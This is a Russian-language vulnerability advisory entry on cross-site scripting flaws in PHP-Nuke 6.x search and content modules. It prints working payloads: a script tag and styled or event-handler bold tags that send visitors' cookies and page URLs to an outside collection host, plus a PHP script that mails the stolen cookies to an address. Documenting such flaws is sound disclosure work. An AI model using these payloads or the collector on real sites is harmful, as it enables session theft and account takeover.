| Дата публикации: | 29.11.2002 |
| Всего просмотров: | 1514 |
| Опасность: | Средняя |
| Наличие исправления: | Нет |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Удаленная |
| Воздействие: | Межсайтовый скриптинг |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | PHP-Nuke 6.x |
| Описание: | phpNuke – популярная система управления содержанием для UNIX и Windows систем.
Несколько модулей phpNuke содержат серьезную уязвимость, которая позволяет хакеру похищать или отключать учетные записи пользователя, и возможно получать административные привилегии. 1. Уязвимость в поисковом модуле Модуль поиска phpNuke не выполняет никакой фильтрации при возвращении "Результатов для x ... " страницы, и в результате восприимчив к межсайтовому скриптингу, через простой запрос типа: <SCRIPT>location.href="http://www.techie.hopto.org/fetch.php ?email=mattmurphy@kc.rr.com&ref="+document.URL+ "cookie="+document.cookie;2. Уязвимость расширенных тэгов в нескольких модулях phpNuke выполняет фильтрацию большинства опасных тэгов, но не принимает во внимание, что некоторые "безопасные" тэги могут иметь злонамеренные свойства. Уязвимость позволяет внедрять произвольные код сценария в модули PM, дискуссий, новостей и т.п. В основном любой модуль, который принимает пользовательский ввод для статьи, сообщения, или комментария, может быть атакован с HTML типа:
<B
STYLE="left:expression(eval('location.href=
\'http://www.techie.hopto.org/fet
ch.php?email=mattmurphy@kc.rr.com&ref=
\'+document.URL+\'cookie=\'+document.c
ookie'))">Bold text -- or an attack?</B>
<B
ONCLICK="location.href=
'http://www.techie.hopto.org/fetch.php?email=mattmurp
hy@kc.rr.com&ref='+document.URL+'cookie=
'+document.cookie">Don't Click</B>
<B
ONMOUSEOVER="location.href=
'http://www.techie.hopto.org/fetch.php?email=matt
murphy@kc.rr.com&ref=
'+document.URL+'cookie='+document.cookie">Keep
Away!</B>
3. Эксплоит:
<?php
error_reporting(0);
$redir_ref = TRUE;
mail($_GET["email"], "phpNuke Cookie", $_GET["cookie"]);
if ($redir_ref) {
header("Location: ".urlencode($_GET["ref"]));
}
?>
уязвимость обнаружена в phpNuke 6.5b1 и более ранних версиях.
|
| Ссылки: | Multiple phpNuke Modules Vulnerable to Cross-Site Scripting |